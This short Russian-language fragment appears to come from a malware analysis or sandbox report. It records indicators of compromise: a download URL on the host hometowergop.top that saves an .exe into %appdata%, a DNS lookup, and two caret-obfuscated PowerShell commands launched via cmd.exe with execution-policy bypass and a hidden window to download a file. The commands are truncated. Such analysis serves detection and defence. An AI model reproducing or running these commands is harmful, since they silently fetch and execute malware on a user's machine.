Техническая информация
- http://hometowergop.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "p^OwE^RS^hEl^l.Ex^e^ -E^xE^CuTIon^PO^LiC^y^ b^YPAs^S^ -noP^Ro^FILe -^w^I^NdOwS^tylE^ ^HI^DD^E^n^ (nEW-obj^ect ^SYSTe^m.n^e^t^.W^ebC^lie^n^t).dowNLOAD^FILe^('http://hometow...
- DNS ASK ho####wergop.top
- '<SYSTEM32>\cmd.exe' /C "p^OwE^RS^hEl^l.Ex^e^ -E^xE^CuTIon^PO^LiC^y^ b^YPAs^S^ -noP^Ro^FILe -^w^I^NdOwS^tylE^ ^HI^DD^E^n^ (nEW-obj^ect ^SYSTe^m.n^e^t^.W^ebC^lie^n^t).dowNLOAD^FILe^('http://hometow...' (со скрытым окном)